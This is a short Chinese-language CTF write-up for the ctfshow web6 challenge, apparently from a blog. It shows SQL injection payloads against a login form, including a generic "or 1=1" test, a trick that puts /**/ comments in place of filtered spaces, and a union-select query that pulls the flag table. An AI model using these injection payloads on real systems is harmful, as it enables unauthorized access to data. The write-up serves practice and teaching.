ctfshow-web6

0x00 前言

0x01 题目

0x02 Write Up

看到是一个登录框,所以先考虑到是sql注入。

使用通用payload进行测试

csharp 复制代码
username=a' or 1=1#&password=a

发现这里出现了 sql inject error

然后测试看是哪一个字符触发了,测试后发现是空格会触发这个问题

那么我们可以选择使用/**/代替空格

然后就是正常流程

csharp 复制代码
username=a'/**/union/**/select/**/1,flag,3/**/from/**/web2.flag#&password=a

以上

相关推荐
儒道易行17 分钟前
平凡的2025年终总结
网络·安全·web安全
m0_738120725 小时前
渗透测试——靶机DC-6详细横向过程(Wordpress渗透)
服务器·网络·python·web安全·ssh·php
week_泽5 小时前
Dvwa靶场搭建_错误汇总
web安全·网络安全·靶场·dvwa
week_泽6 小时前
网安基础_1_补充_网络安全渗透测试学习笔记
笔记·学习·web安全
蓝之白7 小时前
WEB安全_AI_WAF
web安全·ctf
菩提小狗20 小时前
小迪安全笔记_第4天|扩展&整理|30+种加密编码进制全解析:特点、用处与实战识别指南|小迪安全笔记|网络安全|
笔记·安全·web安全
老赵聊算法、大模型备案1 天前
新规解读:2025 年修正版《中华人民共和国网络安全法》核心变化解读
安全·web安全
能年玲奈喝榴莲牛奶1 天前
安全服务-应急响应测评
安全·web安全·安全服务
菩提小狗1 天前
小迪安全_第4天:基础入门-30余种加密编码进制&Web&数据库&系统&代码&参数值|小迪安全笔记|网络安全|
前端·网络·数据库·笔记·安全·web安全
tmj011 天前
文件上传漏洞
web安全